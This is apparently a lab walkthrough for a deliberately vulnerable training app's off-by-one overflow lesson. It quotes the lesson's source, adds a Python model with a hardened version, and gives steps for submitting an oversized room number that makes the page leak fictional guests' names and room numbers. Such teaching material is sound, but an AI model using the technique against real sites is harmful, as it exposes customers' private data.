Buffer-Overflow attack: Off-by-One Overflows Part 1

An Off-by-One Overflow is a vulnerability caused by a programming error that lets input extend one or two bytes beyond the buffer allowed for it.

Goal: 

Perform an overflow attack to get the hotel client list with room info.

Method: 

Try to use the off-by-one overflow vulnerability to perform an overflow attack and collect client info.

Step by step Guide

1. From the source code file OffByOne.java provided, we can see that it has an Off-by-One Overflow vulnerability. So we will overflow "param3", which is ROOM_NUMBER:

    param3 = s.getParser().getStringParameter(ROOM_NUMBER, "");
    input = new Input(Input.HIDDEN, "c", param3);
    ec.addElement(input);
    ec.addElement("\r\n");

    // And finally the check...
    // A room number of up to 4096 characters passes; one of 4097 characters takes
    // the branch below, which adds the other clients' records as hidden fields d..o.
    if(param3.length() > 4096)
    {
        ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "e", "Ravern"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "f", "4321"));
        ec.addElement("\r\n");

        ec.addElement(new Input(Input.hidden, "g", "John"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "h", "Smith"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "i", "56"));
        ec.addElement("\r\n");

        ec.addElement(new Input(Input.hidden, "j", "Ana"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "k", "Arneta"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "l", "78"));
        ec.addElement("\r\n");

        ec.addElement(new Input(Input.hidden, "m", "Lewis"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
        ec.addElement("\r\n");
        ec.addElement(new Input(Input.hidden, "o", "9901"));
        ec.addElement("\r\n");

        s.setMessage("To complete the lesson, restart lesson and enter VIP first/last name");
    }
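To make the 4096/4097 boundary concrete, here is an added Python model of the handler above with a hardened version beside it; it is written for this walkthrough and is not WebGoat's own code. The form field names first/last/room, the OTHER_GUESTS list and the remediation (bounded numeric room number, no other clients' data in the response) are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed stand-in for the data that sits "next to" the room-number buffer in the
# lesson: the other guests' records that the vulnerable branch emits as fields d..o.
OTHER_GUESTS = [("Johnathan", "Ravern", "4321"), ("John", "Smith", "56"),
                ("Ana", "Arneta", "78"), ("Lewis", "Hamilton", "9901")]
ROOM_LIMIT = 4096          # the value the lesson's check compares against
OVERFLOW_FIELDS = "defghijklmno"


def _params(form_body):
    # Assumed field names for the lesson form: first, last, room.
    p = parse_qs(form_body, keep_blank_values=True)
    return (p.get("first", [""])[0], p.get("last", [""])[0], p.get("room", [""])[0])


def vulnerable_handler(form_body):
    """Model of the lesson's logic: a..c echo the submission and, once the room number
    is longer than ROOM_LIMIT, the other guests' data is appended as hidden fields."""
    first, last, room = _params(form_body)
    fields = [("a", last), ("b", first), ("c", room)]
    if len(room) > ROOM_LIMIT:     # 4096 characters pass, 4097 take this branch
        names = iter(OVERFLOW_FIELDS)
        for f_name, l_name, r_no in OTHER_GUESTS:
            fields += [(next(names), f_name), (next(names), l_name), (next(names), r_no)]
    return fields


def hardened_handler(form_body, max_room_digits=4):
    """Assumed remediation: validate the room number before use (digits only, bounded
    length) and keep other clients' records out of the response entirely."""
    first, last, room = _params(form_body)
    if not re.fullmatch(r"[0-9]{1,%d}" % max_room_digits, room):
        raise ValueError("invalid room number")
    return [("a", last), ("b", first), ("c", room)]


def hardened_rejects(form_body):
    """True if the hardened handler refuses the submission."""
    try:
        hardened_handler(form_body)
    except ValueError:
        return True
    return False
```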


2. Now let's use a character generator to generate a number with a length of 4097. There are a couple of websites that you can use to generate the number:

https://www.randomlists.com/random-letters

http://dave-reed.com/Nifty/randSeq

3. Fill in the form with First/Last name, enter the number just generated in the Room number input field and click Submit.

4. Now click through to the next screen and accept the Terms.

5. On the next page, press F12 or right-click to open the Firefox developer tools or Firebug. In the page source you will find the client info:

 

<form accept-charset="UNKNOWN" method="POST" name="form" action="#attack/736032128/600" enctype="">You have now completed the 2 step process and have access to the Internet<br><br>Process complete<br><br>Your connection will remain active for the time allocated for starting now.<br><br><table width="90%" cellspacing="0" cellpadding="2" border="0" align="center"><tbody><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr></tbody></table>

<input name="a" value="Young" type="HIDDEN">

<input name="b" value="David" type="HIDDEN">

<input name="c" value="655311165472798415286699773267………7389893355" type="HIDDEN">

<input name="d" value="Johnathan" type="hidden">

<input name="e" value="Ravern" type="hidden">

<input name="f" value="4321" type="hidden">

<input name="g" value="John" type="hidden">

<input name="h" value="Smith" type="hidden">

<input name="i" value="56" type="hidden">

<input name="j" value="Ana" type="hidden">

<input name="k" value="Arneta" type="hidden">

<input name="l" value="78" type="hidden">

<input name="m" value="Lewis" type="hidden">

<input name="n" value="Hamilton" type="hidden">

<input name="o" value="9901" type="hidden">

<br><br>We would like to thank you for your payment.<br><br></form>

 

Name               Room#
Johnathan Ravern   4321
John Smith         56
Ana Arneta         78
Lewis Hamilton     9901

 

 
